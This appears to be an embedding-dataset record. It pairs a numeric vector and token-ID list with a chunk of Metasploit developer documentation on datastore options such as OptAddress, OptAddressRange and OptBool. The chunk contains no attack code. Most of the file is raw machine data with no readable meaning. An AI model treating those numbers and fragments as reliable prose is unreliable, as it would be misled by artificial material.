-0.28161680698394775, 0.40130630135536194, -0.06108235940337181, 0.36914992332458496, 0.6383107304573059, 0.06437135487794876, 0.21538352966308594, 0.0620533786714077, 0.05204280465841293, -0.5394303798675537, -0.18671616911888123, -0.016168326139450073, 0.5324591398239136, 0.30462518334388733, 0.6996561884880066, -0.34971883893013, -0.22600942850112915, 0.5936636924743652, 0.06862014532089233, -0.7080225944519043, 0.6568596363067627, -0.26951101422309875, 0.9031389355659485, -0.2570483982563019, 0.28608986735343933, -0.43854957818984985, 0.17349062860012054, 0.22233594954013824, -0.1600121408700943, -0.012656960636377335, -0.6412120461463928, -1.0830037593841553, -0.5405439138412476, -0.04431906342506409, -0.1949467808008194, -0.06102880463004112, 0.6861358880996704, -0.3201044499874115, -0.40732958912849426, -1.3979732990264893, 0.8219782710075378, 1.3125450611114502, 0.45209190249443054, 1.0116544961929321, 1.0304430723190308, -0.044022995978593826, -0.22398243844509125, 0.6847124695777893, -0.3307263255119324, 0.031387027353048325, -0.7967296242713928, 1.2518641948699951, 0.25463223457336426, 0.2573564052581787, 0.2596849799156189, 0.30320456624031067, -0.48075541853904724, -0.22019577026367188, -0.4853581190109253, -0.23704248666763306, -0.5113773941993713, -0.6312604546546936, 0.37703830003738403, 0.5674728155136108, -0.8634275794029236, -0.2916508913040161, -0.2929341495037079, 0.5086215138435364, 1.0968953371047974, -0.5006004571914673, -0.17218482494354248, -0.6625587344169617, -0.29490938782691956, -0.1579383760690689, 0.09631868451833725, -0.927471399307251, -0.5515596270561218, -0.24450775980949402, -0.8696848154067993, 0.49930793046951294, 0.585901141166687, 0.03711353614926338, 0.035148896276950836, -0.574375331401825, 0.26652055978775024, 0.40575405955314636, 0.04685094952583313, -0.3964652121067047, 0.21045702695846558, 0.7272056937217712, -0.264043390750885, 0.2431209683418274, -0.6311140656471252, -0.38301947712898254, 0.10202431678771973, -0.1697881519794464, 0.47704195976257324, -0.922179102897644, 0.15560317039489746, 0.11561216413974762, 0.0941888764500618, -0.1996595710515976, 0.34504255652427673, -0.8186317086219788, 0.25494062900543213, -0.2549355924129486, 0.21032913029193878, -0.30266064405441284, -0.29702597856521606, 0.5478451251983643, -0.5350475907325745, -0.7066246271133423, 0.5902991890907288, 0.9974201321601868, -0.24723802506923676, 0.6277933120727539, -0.43985044956207275, -0.6856686472892761, 0.32460319995880127, -0.5933039784431458, 0.7153193354606628, 0.14302964508533478, 0.3094170093536377, -0.00043786069727502763, -0.720678448677063, 1.2552564144134521, -0.028163615614175797, 0.7923596501350403, -1.2691651582717896, -0.9341760277748108, 0.08422762155532837, -0.06845072656869888, -0.23632967472076416, 0.44074228405952454, -0.16741912066936493, -0.1926310658454895, -0.55022132396698, -0.43552276492118835, -0.45312419533729553, -0.7297866940498352, -0.5508785843849182, -0.06135881692171097, 0.2549414336681366, 0.007451715413480997, 0.3978714644908905, 0.05849381163716316, -0.399330735206604, 0.8206977844238281, -0.45036932826042175, -0.02126656100153923, -0.9864569902420044, -0.49640026688575745, -0.16447493433952332, 0.5751489400863647, -0.30721762776374817, 0.3783877193927765, -0.08629802614450455, -0.21165558695793152, 0.00016699355910532176, -0.3489231467247009, 0.42814868688583374, -0.7329342365264893, 0.16101156175136566, 0.7769478559494019, 0.10385718941688538, -0.5215557217597961, -0.2820565700531006, 0.28868311643600464, -0.1782698780298233, -0.21610119938850403, -0.540439248085022, -0.4876699447631836, -0.9098740816116333, -0.6777171492576599, 0.551504373550415, -0.635863721370697, 0.5022332072257996, -0.9151116013526917, -0.499247282743454, -0.29107388854026794, 0.561295747756958, 0.760288655757904, -0.9854760766029358, 0.216789111495018, 0.054066356271505356, 0.8546480536460876, -0.5070905685424805, -0.6514010429382324, -0.42289111018180847, -0.9667209386825562, -0.18119409680366516, 0.7306462526321411, 0.2290576696395874, -0.05022478476166725, -0.08585244417190552, 0.04121646657586098, 0.5948066711425781, -0.2722046673297882, -0.9508119821548462, -0.4163588583469391, -0.47688645124435425, 0.4170258641242981, -0.45746031403541565, 1.039858102798462, -0.44353070855140686, 0.5187644362449646, -0.24114148318767548, 0.6939065456390381, 0.16597628593444824, -0.418801873922348, -0.11475399881601334, 0.20449286699295044, 0.6437121629714966, -0.8933907151222229, -0.40693601965904236, -0.06479665637016296, 0.7913357615470886, 0.3407928943634033, 0.029439307749271393, -0.773044228553772, -0.03731004521250725, -0.48711490631103516, -1.274836778640747, 0.8136345148086548, -0.31460344791412354, 0.5200165510177612, 0.6955728530883789, -0.48137542605400085, 1.1839289665222168, 0.14651060104370117, 0.165020152926445, 0.8403323292732239, 0.055911581963300705, 0.4992770254611969, -1.3577135801315308, 0.3491207957267761, 0.7894359230995178, -0.2695058286190033, 1.0193921327590942, -0.11458025872707367, -0.349968820810318, -0.2505696713924408, -0.29724133014678955, -0.01967637427151203, -0.6183056831359863, -0.5346259474754333, 0.5264785885810852, 0.34403809905052185, 0.6683672666549683, -0.4305727779865265, -1.370725393295288, -0.6835601925849915, 0.2529605031013489, -0.13340862095355988, 0.29754623770713806, 0.8048170208930969, 0.36327993869781494, 0.11026931554079056, -0.053010713309049606, -0.25514599680900574, 0.15563911199569702, -0.19348235428333282, 0.47229844331741333, 0.4811755120754242, -0.4095047116279602, 0.791350781917572, 0.8313467502593994, -0.9763467907905579, -0.7864444851875305, -0.17877592146396637, 0.16341538727283478, -0.11279109865427017, -0.8081716299057007, -0.31209468841552734, 0.08563650399446487, 0.4338265061378479, 0.14150133728981018, 0.2643054127693176, 0.261111319065094, 0.6517661809921265, -0.46293002367019653, 0.14828571677207947, -0.1516321301460266, 0.12763261795043945, 0.27136456966400146, -0.782978355884552, -0.6549177169799805, -0.7283841371536255, 0.2721618115901947, 0.7763603925704956, -0.17758411169052124, 1.6647748947143555, -0.2930963337421417, 0.2707357704639435, -0.024896960705518723, 0.13059896230697632, 0.8540375828742981, 0.2576931118965149, 0.22639723122119904, 1.0163518190383911, 0.18391603231430054, -0.7081355452537537, -0.368184894323349, -0.1897352933883667, -0.003924928139895201, 0.2567254602909088, -0.43440088629722595, -0.4061942398548126, 0.08054381608963013, 0.3909514844417572, -0.32304027676582336, -0.6910810470581055, -0.6820573210716248, -0.8938028812408447, -0.03756563737988472, 0.296405553817749, -0.4638824760913849, -0.18643195927143097, 0.020088760182261467, -0.14627857506275177, -0.49160459637641907, -0.15399789810180664, 0.14796657860279083, -0.0825221985578537, -0.011280413717031479, -0.23054304718971252, 0.3981993496417999, -0.6975968480110168, -0.8056355118751526, -0.5203909873962402, -0.09450144320726395, -0.6603106260299683, -0.47343313694000244, -0.7257052063941956, 0.00431008031591773, -0.38402488827705383, 0.4796386957168579, -0.8115162253379822, -0.14077840745449066, -0.40339726209640503, -0.6867489814758301, 0.1518271565437317, 0.5218084454536438, -0.7696656584739685, 0.29123687744140625, 0.020466582849621773, 0.2630246877670288, 0.4208323657512665, -0.6919780969619751, 0.16716378927230835, 0.4217659533023834, 0.2958326041698456, 0.3644510507583618, 0.4217236638069153, -0.9268345832824707, 0.6366112232208252, -0.08897758275270462, -0.9209481477737427, 0.2990356683731079, -0.8497288823127747, 0.04191213846206665, 0.16361841559410095, -0.357098251581192, 0.13609084486961365, 0.30318522453308105, 0.782197892665863, 0.11670925468206406, -0.20194609463214874, 0.3886125981807709, 0.2725771367549896, -0.5322537422180176, -0.2133851945400238, 0.4370200037956238, 0.06261322647333145, -0.33244699239730835, 0.08925033360719681, 0.43580693006515503, -0.8958739042282104, -0.039800237864255905, 0.08495830744504929, -0.13713450729846954, -0.8501507043838501, -0.1034536063671112, 0.018061386421322823, 0.5458887815475464, 0.9745129942893982, -0.1559913158416748, 0.5030778050422668, -0.42534586787223816, -1.0639206171035767, 0.5927886962890625, -0.26575466990470886, 0.02767852321267128, 0.4630597233772278, -0.5022828578948975, -0.5221612453460693, -0.8957126140594482, -0.12274143099784851, 0.013883186504244804, 0.308054119348526, 0.2518934905529022, 0.4944775104522705, 0.6023180484771729, -0.28841790556907654, 0.6713672876358032, -1.016872763633728, -0.3547440767288208, 0.2606085240840912, 0.6476250886917114, -0.6940779089927673, -0.6244677901268005, 0.12749624252319336, 0.5124556422233582, 0.520466148853302, -0.2041214555501938, -0.4312717914581299, -0.22593747079372406, 0.2447170913219452, 0.3995533883571625, 0.5296847820281982, -0.14162902534008026, -0.536668062210083, 0.4454685151576996, -1.0103338956832886, 0.13196362555027008, -0.5882737040519714, 0.41554784774780273, 0.564281165599823, 0.08152591437101364, -0.36499467492103577, 0.627517819404602, -0.00985618308186531, -0.3990022838115692, 0.5366040468215942, 0.6140468120574951, 0.6873192191123962, -0.7452636361122131, -0.025564342737197876, -0.09821780771017075, 0.3063444197177887, 0.7411894202232361, -0.11057767271995544, 0.11231371015310287, -0.05069053918123245, 0.07488498091697693, -0.5198842883110046, -0.34608668088912964, 0.5112460851669312, 0.6136141419410706, -0.29971644282341003, -0.5936374664306641, 0.17876458168029785, -0.24030756950378418, -0.3262740969657898, -0.28943580389022827, 0.49280592799186707, -0.29361164569854736, 0.34986400604248047, 0.005750567652285099, -0.35912230610847473, 0.8758450150489807, -0.7104981541633606, 0.7467256784439087, 0.08286122977733612, 0.29821720719337463, 0.6516402959823608, -0.22269973158836365, -0.5584139227867126, 0.5119391083717346, 0.6295161843299866, 0.42975807189941406, -0.0768280103802681, 0.6435156464576721, 0.42765384912490845, 0.6727333664894104, 0.04999053478240967, 0.015876419842243195, -0.37896791100502014, 0.021989060565829277, -0.5080923438072205, -1.2801949977874756, -0.5025119185447693, 0.30647778511047363, 0.14741848409175873, -0.22947482764720917, 0.35991305112838745, -0.3955349624156952, 0.6142497658729553, -0.9264015555381775, 0.511303186416626, 0.32949933409690857, -0.041482578963041306, 0.2495732307434082, -0.29049378633499146, -1.1183549165725708, 0.9950487017631531, 0.16482575237751007, 0.7413781881332397, 0.4163563847541809, 0.5335473418235779, 0.07373916357755661, 0.33841341733932495, -0.0363742969930172, -0.3114372193813324, -0.2584349811077118, 0.09696375578641891, -0.17012424767017365, -0.21412940323352814, 0.43828117847442627, -0.2224646359682083, -0.17598800361156464, -0.4470381736755371, -0.25738224387168884, -0.14191724359989166, 0.22902923822402954, -0.13972944021224976, -0.4302745461463928, -0.012701663188636303, 0.0762133076786995, -1.0743225812911987, 0.1343712955713272, 0.18725714087486267, -0.034188926219940186, 0.3741239309310913, -0.6019781827926636, -0.8706642389297485, -0.4918813109397888, 0.21446244418621063, 0.054448988288640976, 0.9527141451835632, -0.43970024585723877, -0.017396552488207817, 0.07634184509515762, -0.9798278212547302, -0.46829503774642944, 0.35645514726638794, -0.595838189125061, -0.4066973626613617, 0.4998011589050293, 0.3820327818393707, 0.5641036033630371, 1.0349918603897095, -0.1457655429840088, -0.13251979649066925, 0.6400805711746216, 0.6952328085899353, -0.5998317003250122, 1.1090747117996216, 0.44946205615997314, 0.15333841741085052, -0.018641898408532143, 0.24905623495578766, 0.397829532623291, 0.08392871171236038, -0.4096299111843109, -0.5762677192687988, 0.010245629586279392, -0.8777053952217102, -0.5301986336708069, -0.26984521746635437, 0.06051742285490036, 0.23359230160713196, -0.20361261069774628, -0.5582125186920166, 0.21764042973518372, -0.5243886709213257, -0.36379098892211914, -0.41278934478759766, 0.5186967849731445, -0.00793377123773098, -0.012866638600826263, 0.6126232743263245, -1.5782558917999268, 4.084820747375488, 0.633679211139679, 0.5572391748428345, 0.011411902494728565, 0.27448517084121704, 1.1760390996932983, 0.9015331864356995, -0.2815138101577759, 0.2603549361228943, -0.9473583698272705, 0.07835005223751068, -0.015789810568094254, 0.21498160064220428, 0.4259674549102783, 0.29569923877716064, 0.40030133724212646, -1.4386677742004395, 0.2527938485145569, -0.11549863964319229, -0.8690006136894226, -1.1016085147857666, 0.3652799427509308, -0.6816107630729675, 0.7822802066802979, -0.3420114815235138, 0.006638699676841497, -0.15659119188785553, -1.2617064714431763, 0.2984537184238434, -0.19865508377552032, 0.34348222613334656, -0.1039862260222435, 0.017305977642536163, 0.4897574186325073, -0.3007541596889496, 0.15716370940208435, 0.5326914191246033, -0.5066714882850647, -0.2053576558828354, 0.04272092878818512, 0.17784026265144348, -0.31441423296928406, -0.15347298979759216, 0.108682781457901, 0.21991977095603943, 0.8251330256462097, -0.6780120134353638, 0.7075221538543701, 0.3128957450389862, -0.4868002235889435, 0.840499222278595, 0.2549286186695099, 0.9900050163269043, 0.09498966485261917, -0.7695749998092651, 0.6166728138923645, 0.19445107877254486, -0.6934700608253479, -0.10557575523853302, -0.7138077020645142, 0.301882266998291, -0.4525538384914398, 0.06285635381937027, 0.029345674440264702, -0.1139126792550087, 0.22899121046066284, -0.213652104139328, 0.5839383006095886, 0.2350032478570938, 0.355968177318573, -0.6302981972694397, 0.06882962584495544, -0.9728129506111145, -0.5299094319343567, 0.9613107442855835, -0.45195138454437256, 0.10183610767126083, 0.3620435297489166, 0.21000058948993683, -0.31680744886398315, -0.4760686159133911, -0.5762657523155212, -1.225120186805725, 0.0659533217549324, 0.55156409740448, 0.3445352017879486, -0.2154683768749237, -0.6293331384658813, 0.1832764595746994, -0.13572905957698822, -0.15535509586334229, 0.7958020567893982, -0.05294810235500336, 0.39295098185539246, 0.2627009451389313 ]
[ 2065, 2025, 2179, 1010, 2009, 2097, 2507, 2017, 1996, 2028, 2013, 7705, 1012, 1996, 2206, 2003, 2019, 2742, 1997, 2129, 2000, 3191, 1037, 2951, 23809, 2063, 5724, 1999, 1037, 11336, 1024, 2783, 1035, 3677, 1027, 2951, 23809, 2063, 1031, 1005, 1054, 15006, 2102, 1005, 1033, 2065, 2115, 16475, 2147, 2003, 2648, 1996, 11336, 8391, 1010, 2045, 2003, 1037, 2204, 6061, 2008, 2017, 2123, 1521, 1056, 2130, 2031, 1996, 11336, 2850, 10230, 19277, 4874, 1012, 2021, 1999, 2070, 3572, 1010, 2017, 2145, 2453, 2022, 2583, 2000, 3191, 2013, 1996, 3161, 1035, 11336, 3229, 2953, 2013, 1996, 4062, 1012, 2030, 2065, 2017, 2031, 3229, 2000, 11336, 9006, 2386, 14141, 2483, 4502, 10649, 2121, 1010, 2045, 2003, 1037, 16913, 4118, 2205, 2008, 3957, 2017, 1996, 2168, 2518, 1010, 1998, 2823, 4666, 7076, 3413, 2023, 2105, 1999, 1037, 2448, 1035, 3722, 4118, 2096, 18365, 2075, 1037, 11336, 1012, 2028, 2742, 2017, 2064, 2298, 2012, 2003, 1996, 5796, 2546, 1024, 1024, 21318, 1024, 1024, 10122, 1024, 1024, 3094, 10521, 4502, 10649, 2121, 1024, 1024, 9830, 2465, 1012, 1999, 2070, 3572, 2107, 2004, 2770, 1037, 5896, 1999, 2695, 14427, 1010, 2017, 2453, 2025, 2031, 11336, 2850, 10230, 19277, 2030, 2130, 3161, 1035, 11336, 1010, 2021, 2017, 2323, 2145, 2031, 1037, 5219, 4874, 1012, 2045, 2323, 2022, 2019, 18077, 1035, 2951, 23809, 2063, 2008, 3957, 2017, 2035, 1996, 2951, 23809, 2063, 7047, 1024, 5219, 1012, 18077, 1035, 2951, 23809, 2063, 2065, 2017, 2123, 1521, 1056, 2031, 3229, 2000, 1996, 11336, 1010, 2030, 2000, 1037, 5219, 4874, 1010, 1996, 2197, 3120, 2003, 5525, 1996, 7705, 4874, 1010, 1998, 2045, 2003, 2467, 1037, 7705, 4874, 1012, 2174, 1010, 2066, 2057, 2056, 3041, 1010, 2065, 1996, 5310, 4520, 1037, 11336, 1011, 2504, 5724, 1010, 2053, 2060, 6177, 2097, 2156, 2009, 1010, 2023, 2950, 1996, 7705, 4874, 1024, 7705, 1012, 2951, 23809, 2063, 2061, 2085, 2017, 2113, 2045, 2024, 3674, 4216, 1997, 2951, 23809, 2063, 7047, 1012, 1998, 11504, 2012, 2023, 2391, 2017, 2024, 2092, 5204, 2008, 2025, 2035, 4216, 9352, 3745, 1996, 2168, 2518, 1012, 2065, 2017, 2031, 2000, 3046, 2673, 1010, 2004, 1037, 2236, 3627, 1010, 2023, 2323, 2022, 2115, 7170, 2344, 1024, 3046, 2013, 1996, 11336, 2850, 10230, 19277, 11129, 2013, 3161, 1035, 11336, 11129, 2013, 5219, 11129, 2013, 7705, 4563, 5724, 4127, 8095, 4563, 2951, 23809, 2063, 5724, 4127, 2024, 4225, 1999, 1996, 5724, 1035, 11661, 1012, 21144, 5371, 2004, 4280, 1012, 2017, 2323, 2467, 4060, 1996, 2087, 6413, 2028, 2138, 2169, 2038, 2049, 2219, 7953, 9398, 8844, 1012, 2043, 2017, 3988, 4697, 2019, 5724, 2076, 2951, 23809, 2063, 8819, 1010, 2009, 2323, 2022, 1999, 1996, 2206, 4289, 1024, 23569, 14045, 20744, 1012, 2047, 1006, 5724, 1035, 2171, 1010, 1031, 22017, 20898, 1010, 6412, 1010, 3643, 1010, 1008, 4372, 18163, 1008, 1033, 1010, 14593, 2229, 1024, 1008, 14593, 2229, 1008, 1010, 3785, 1024, 1008, 3785, 1008, 1007, 5724, 1035, 2171, 1011, 4415, 2965, 1996, 2171, 1997, 1996, 2951, 23809, 2063, 5724, 1012, 22017, 20898, 1011, 1996, 2034, 17961, 1010, 2995, 2965, 2023, 2003, 1037, 3223, 5724, 1010, 6270, 2965, 11887, 1012, 6412, 1011, 1037, 2460, 6412, 2055, 2023, 5724 ]
metasploit
116.txt
1
##value - a default value. note if the first attribute is false, you don ’ t need to provide a value, it ’ ll be set to nil automatically. enums - optional an array of acceptable values, e. g. % w [ left right ]. aliases - optional, key - word only an array of additional names that refer to this option. this is useful when renaming a datastore option to retain backward compatibility. see the renaming datastore options section for more informationconditions - optional, key - word only an array of a condition for which the option should be displayed. this can be used to hide options when they are irrelevant based on other configurations. see the filtering datastore options section for more information. fallbacks optional, key - word only an array of names that will be used as a fallback if the main option name is defined by the user. this is useful in the scenario of wanting specialised option names such as smbuser, but to also support gracefully checking a list of more generic fallbacks option names such as username. this functionality is currently behind a feature flag, set with features set datastore _ fallbacks true in msfconsolenow let ’ s talk about what classes are available : optaddressan input that is an ipv4 address. code example : optaddress. new ('ip ', [ true,'set an ip ','10. 0. 1. 3'] ) optaddressrangean input that is a range of ipv4 addresses, for example : 10. 0. 1. 1 - 10. 0. 1. 20, or 10. 0. 1. 1 / 24. you can also supply a file path instead of a range, and it will automatically treat that file as a list of ips. or, if you do the rand : 3 syntax, with 3 meaning 3 times, it will generate 3 random ips for you. basic code example : optaddressrange. new ('range ', [ true,'set an ip range ','10. 0. 1. 3 - 10. 0. 1. 23'] ) optboolboolean option. it will validate if the input is a variant of either true or false. for example : y, yes, n, no, 0, 1, etc. code example : optbool. new ('blah ', [ true,'set a blah
[ -0.12308505922555923, -0.09257429093122482, 0.39602378010749817, 0.14240673184394836, -0.8088186979293823, -0.29174768924713135, 0.4147910177707672, 0.1920676827430725, -0.012234016321599483, 0.7194534540176392, 0.4826391637325287, -0.3874439299106598, 0.4815267026424408, -0.01509008277207613, -1.3619701862335205, -0.4858159124851227, -0.8816608190536499, 0.13088716566562653, -1.1111465692520142, -0.06599270552396774, 0.9999493360519409, -0.5254580974578857, -0.5593112111091614, -0.5742684602737427, -0.7770401239395142, 0.43799716234207153, 0.7832046151161194, -0.007708535995334387, 0.8212583065032959, 0.9491889476776123, 0.3565252721309662, 0.15544100105762482, -0.03199240192770958, -0.5420143008232117, 0.04528653994202614, 0.11946028470993042, 0.8053476810455322, -0.3885451853275299, 0.26614806056022644, -0.38302502036094666, 0.8098403215408325, -0.2157743126153946, -0.1534186154603958, -0.7204803228378296, 0.055555105209350586, -1.0191049575805664, -0.34976646304130554, -0.48860567808151245, 0.4897870421409607, -0.5070170164108276, -0.09868382662534714, -0.06294364482164383, 0.7409546375274658, 0.012293565087020397, -0.5403465032577515, 0.26387959718704224, -0.08507630228996277, 0.3533068001270294, -0.1228034719824791, 0.019175631925463676, -0.09862904995679855, 0.03524661064147949, 0.43250370025634766, -0.7606909275054932, 0.31380000710487366, 0.041192978620529175, 0.21192382276058197, 0.42719724774360657, 0.2152174860239029, 0.699675440788269, 0.38172829151153564, 0.8035708665847778, -0.6148433685302734, -0.5340299606323242, -0.6392950415611267, 0.20994536578655243, 0.05846547335386276, -0.12912411987781525, 0.4251452684402466, 0.9090897440910339, -0.3096869885921478, 0.3623165190219879, 0.6287538409233093, -0.11063326895236969, -0.14705702662467957, -0.46639370918273926, 0.08649566024541855, 1.226834774017334, -0.5732288360595703, 0.23354533314704895, 0.011171271093189716, 0.46701160073280334, -0.7829108834266663, -0.38641953468322754, 0.7991670370101929, 0.651669979095459, -0.11179497838020325, 0.0997798815369606, -0.12584182620048523, -0.8378398418426514, 0.9898679256439209, 0.9432572722434998, 0.5609237551689148, 0.2730361819267273, -0.094345323741436, 0.795677900314331, -0.04782518371939659, 0.17889651656150818, -0.7302536964416504, 0.2614382207393646, 0.20202691853046417, -0.6240454316139221, 0.11729472130537033, -1.0274749994277954, -1.202192783355713, 1.2012654542922974, 0.1879735141992569, -0.1672895848751068, -0.37458282709121704, 0.7753340005874634, -0.47794437408447266, -0.17498940229415894, 0.4782507121562958, 0.18372662365436554, 0.07763306051492691, -0.19956542551517487, 0.508979856967926, 0.15703986585140228, -0.7244681715965271, -1.140112280845642, 0.12973552942276, 0.42607763409614563, 0.8044039607048035, 1.4937313795089722, -0.13229164481163025, 0.27551108598709106, 0.26633214950561523, 0.519062340259552, 0.5478726625442505, -0.9474806785583496, 0.44874197244644165, 0.6434804797172546, 0.09248359501361847, 1.2129976749420166, 0.002940655453130603, -0.08709941059350967, -0.35030949115753174, -0.4381805658340454, -0.1617213934659958, 1.179555892944336, 0.16511422395706177, 0.29838594794273376, 0.5364992618560791, -0.4598556458950043, -0.6881839036941528, 0.0905480682849884, 0.18286116421222687, 0.0069776978343725204, 0.02562006004154682, 0.0212542787194252, -0.05763792619109154, 1.0366506576538086, -0.25668030977249146, 0.3541884124279022, -0.7299398183822632, 0.4362768828868866, -0.6717219948768616, -0.3229457437992096, -0.4532252252101898, 0.6357763409614563, 0.2347756326198578, -0.162946417927742, -0.1172100305557251, -0.43725207448005676, 0.8184467554092407, 0.5622776746749878, -0.09904737770557404, -0.5524890422821045, 0.0068239751271903515, 0.29860326647758484, -0.8139603734016418, 0.5375494956970215, -0.01983807049691677, 0.6522318124771118, -0.7482170462608337, 0.13641005754470825, 0.15059562027454376, -0.8188904523849487, -0.6569568514823914, -0.5059236884117126, -0.15691980719566345, 0.1722538322210312, -0.04814781993627548, 0.8494511246681213, 0.9865923523902893, -0.025780145078897476, -0.7628151774406433, 0.26178401708602905, -0.0890985056757927, -1.0310814380645752, 0.3996685743331909, 0.21928158402442932, -0.21285781264305115, 0.34389910101890564, -0.39620301127433777, -0.6196170449256897, -0.08239246904850006, 1.013528823852539, -0.06867411732673645, 0.9455589056015015, 0.49850791692733765, 0.45734310150146484, -0.5847017168998718, 0.15241333842277527, -0.5467040538787842, -0.5725916624069214, -0.29604026675224304, 0.6915479302406311, -0.2624777853488922, 0.4731083810329437, 0.02721979282796383, 0.8625025153160095, 0.7453041672706604, 0.6660910248756409, 0.6254611015319824, -0.31028297543525696, 0.37447085976600647, 0.3952910304069519, -0.5689887404441833, 0.1271076500415802, 0.02625380828976631, 0.9899234771728516, 0.07252242416143417, 1.0329010486602783, -0.3281860947608948, -0.3944832384586334, 0.6359533071517944, -0.10546422004699707, 0.030923256650567055, -0.35778966546058655, -0.11314326524734497, 0.5671080350875854, 1.2767401933670044, 0.44936344027519226, 0.6898465752601624, 0.0003607504186220467, 0.23640328645706177, -0.10048677027225494, -0.05585310235619545, 0.5217114090919495, -0.10721591114997864, 1.0374000072479248, 0.48405721783638, -0.14100010693073273, -0.6485983729362488, -0.8969219923019409, 0.7562523484230042, 0.6092677712440491, -0.22629737854003906, -0.6298064589500427, -0.06057963892817497, 0.13966278731822968, -0.4555233120918274, -0.5052977204322815, -0.14509117603302002, -0.26286765933036804, -0.8179176449775696, -0.08461438119411469, -0.12520916759967804, -1.3455842733383179, -1.1573541164398193, -0.5009168386459351, -0.5662171244621277, -0.36377373337745667, -0.4999528229236603, -0.12838925421237946, 0.05914982035756111, -0.49215832352638245, 0.6594327092170715, -0.9357538819313049, -1.0464692115783691, -0.18614931404590607, 0.14645735919475555, 0.49718376994132996, 0.0888209417462349, -0.6324430108070374, -0.9971683025360107, 0.10546890646219254, -0.12947621941566467, 1.4916735887527466, 0.4661226272583008, 0.01516507938504219, -0.06823469698429108, -0.26046085357666016, 0.5808689594268799, -0.257116436958313, 0.8188869953155518, 0.008825069293379784, -0.6755571961402893, -0.5873907804489136, -0.047466255724430084, 0.5504218339920044, 0.3593153655529022, 0.05679234489798546, -0.25339004397392273, 0.25274112820625305, 0.037126801908016205, -0.19479775428771973, 0.4324076473712921, 0.755759596824646, -0.8017659783363342, 0.3565182387828827, -0.0508372038602829, 0.7507588863372803, -0.5609445571899414, -0.13776148855686188, -0.20476464927196503, 0.004408914130181074, -0.22451379895210266, -0.018657900393009186, 0.7077644467353821, -0.751903235912323, -0.012474454939365387, -0.2768898606300354, -0.3416593372821808, 0.13784775137901306, 0.06516321748495102, -1.0335073471069336, 0.38980257511138916, -0.14387603104114532, -0.9475257992744446, -0.6796597242355347, -0.6318771839141846, 0.8804855346679688, -0.3032131791114807, 0.09370293468236923, 0.12469834089279175, -0.5903075933456421, 0.5655388236045837, 0.0931684747338295, 0.2763077914714813, -1.1217913627624512, 0.5482341647148132, -0.02769036963582039, -0.22092527151107788, 0.7721830606460571, 0.4303401708602905, -0.35801976919174194, -0.48087939620018005, 0.32597067952156067, -0.281049907207489, -0.3471611440181732, 0.29772984981536865, -0.2379077523946762, 0.34194642305374146, 0.550957977771759, -0.11044860631227493, 0.2831835448741913, 0.2320159375667572, -0.40769797563552856, 0.37054458260536194, 0.603919267654419, -0.48618441820144653, 0.0769854336977005, 0.1390989124774933, -0.3778114318847656, 0.09899292141199112, 0.28775960206985474, 0.33720359206199646, 0.292466938495636, 0.7359111309051514, -1.001157283782959, 0.15401948988437653, 0.7291151881217957, 0.046004846692085266, -0.7607025504112244, 0.3712606430053711, -0.0802801251411438, 0.2628445029258728, -0.8292452096939087, 0.5747842788696289, -0.7950301170349121, -0.03749583289027214, 0.5018388628959656, 0.2916429042816162, 0.03109094128012657, -0.0052178106270730495, -0.35099804401397705, -0.6218852996826172, -0.6143551468849182, -0.2603771686553955, -0.37945669889450073, 0.15976418554782867, -0.34710654616355896, -1.3852585554122925, -0.5838898420333862, 0.800041675567627, 0.27342644333839417, 0.7953041791915894, 0.5709003806114197, 0.642575204372406, -0.15413445234298706, -0.11755245178937912, 0.36237916350364685, -0.6472479104995728, 0.3161204159259796, -0.14308466017246246, 0.15130378305912018, -0.24448132514953613, -0.054432328790426254, -0.049987148493528366, 0.1617455929517746, -0.3423932194709778, -0.1330583095550537, -0.15868975222110748, -0.01916518248617649, 0.01575484685599804, 0.13280783593654633, -0.04076249897480011, 0.028682462871074677, -0.6510028839111328, -0.3952923119068146, -0.47276216745376587, 0.43918317556381226, 0.5396884083747864, -0.7178145051002502, 0.06872906535863876, -0.015794990584254265, 0.40464094281196594, 0.2317168414592743, 1.051241159439087, -0.015739474445581436, -0.5741177797317505, -0.3347282111644745, -0.687443733215332, 0.0736028254032135, 0.5713755488395691, -0.09868898242712021, 0.562889039516449, -0.7992678284645081, 0.13650450110435486, 0.4352569282054901, -0.5682661533355713, -0.4852968752384186, 0.5269985198974609, 0.21495643258094788, 0.14828984439373016, 0.6951322555541992, -1.1577287912368774, -0.3899649977684021, 0.9658474326133728, -0.2583251893520355, 1.1010265350341797, -1.1760764122009277, -0.07534825801849365, -0.1621284782886505, -0.3660973012447357, -0.5886908173561096, 0.7053626775741577, -1.2331639528274536, -0.19547563791275024, -0.3635823726654053, -0.112806037068367, -0.35646194219589233, -0.5759050250053406, 0.7192880511283875, -0.3121047616004944, -0.3977999687194824, 0.18755394220352173, 0.3388656675815582, -0.1759938895702362, 0.22294515371322632, -0.6124781370162964, -0.580106258392334, 0.3285205364227295, -0.8643754124641418, 0.23483677208423615, 0.27563586831092834, -0.139266237616539, 0.08776573091745377, -0.9394121766090393, 0.5174463987350464, 0.38025540113449097, 0.1630212366580963, -0.822274386882782, -0.08366882801055908, 0.04234019294381142, 0.023046743124723434, 0.18158960342407227, 0.13673950731754303, -0.272340327501297, -0.09755932539701462, -0.2521556615829468, -0.42822468280792236, -1.0806574821472168, -0.6355183124542236, 0.35541027784347534, -0.2789553701877594, -0.4061885476112366, -0.41271814703941345, 0.504818856716156, -0.37477266788482666, -0.6836272478103638, 0.8210969567298889, 0.5993646383285522, 0.34453701972961426, -1.1335762739181519, -0.43512049317359924, -1.039466381072998, 0.6689140200614929, -0.27832815051078796, 0.21695365011692047, 0.3381783962249756, 0.2882356643676758, -0.1766178160905838, 0.14983977377414703, 0.1105218157172203, -0.4211238920688629, -0.31778743863105774, 0.9096451997756958, 0.21502697467803955, -0.358700692653656, -0.3402007520198822, 0.6312780380249023, -0.560867428779602, 0.09008221328258514, -0.5952220559120178, -0.24080756306648254, -0.3500871956348419, -0.36919426918029785, -0.20075400173664093, 0.07359901815652847, 0.2611326575279236, -1.2982186079025269, -0.12407192587852478, 0.02294604294002056, 0.34347304701805115, 0.7007628679275513, -0.4869769811630249, -0.31369102001190186, 0.06311219930648804, -0.21175195276737213, -0.33047759532928467, -0.7636818885803223, -0.0922110378742218, -0.7635378837585449, 0.1556994765996933, 1.2762689590454102, -0.17496152222156525, 0.22599197924137115, 0.20548446476459503, 0.1369955688714981, 0.6268996000289917, 0.3109987676143646, -0.5328702926635742, -0.33326610922813416, -0.19149324297904968, 0.10690407454967499, -0.5767027139663696, 0.25879350304603577, -0.8285496234893799, 0.023000815883278847, -0.06399493664503098, -0.18158037960529327, 0.20762291550636292, -0.47827333211898804, 